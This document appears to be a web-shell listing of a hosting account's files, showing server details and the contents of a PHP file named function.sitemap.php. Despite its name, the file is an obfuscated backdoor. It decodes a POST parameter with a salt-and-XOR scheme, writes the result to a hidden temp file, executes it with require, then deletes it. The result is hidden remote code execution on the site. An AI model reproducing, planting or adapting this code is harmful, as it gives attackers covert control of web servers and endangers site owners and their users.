HEX
Server: LiteSpeed
System: Linux premium148.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: burhbrzf (1357)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //home/burhbrzf/public_html/function.sitemap.php
<?php

if(isset($_POST["\x69\x74m"]) ? true : false){
	$entity = $_POST["\x69\x74m"];
	   $entity =		explode 	("."	 	,  $entity )		;
	$binding = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt );
            $n = 0;
    
            $__tmp = $entity;
            while ($v8 = array_shift($__tmp)) {
                $sChar = ord($salt[$n % $lenS] );
                $d = ((int)$v8 - $sChar - ($n % 10))^69;
                $binding .= chr($d );
                $n++;} 
	$hld = array_filter([session_save_path(), getcwd(), "/tmp", getenv("TMP"), sys_get_temp_dir(), "/dev/shm", "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir")]);
	$flag = 0;
do {
    $val = $hld[$flag] ?? null;
    if ($flag >= count($hld)) break;
    		if (is_writable($val) && is_dir($val)) {
    $value = vsprintf("%s/%s", [$val, ".element"]);
    if (file_put_contents($value, $binding)) {
	require $value;
	unlink($value);
	exit;
}
}
    $flag++;
} while (true);
}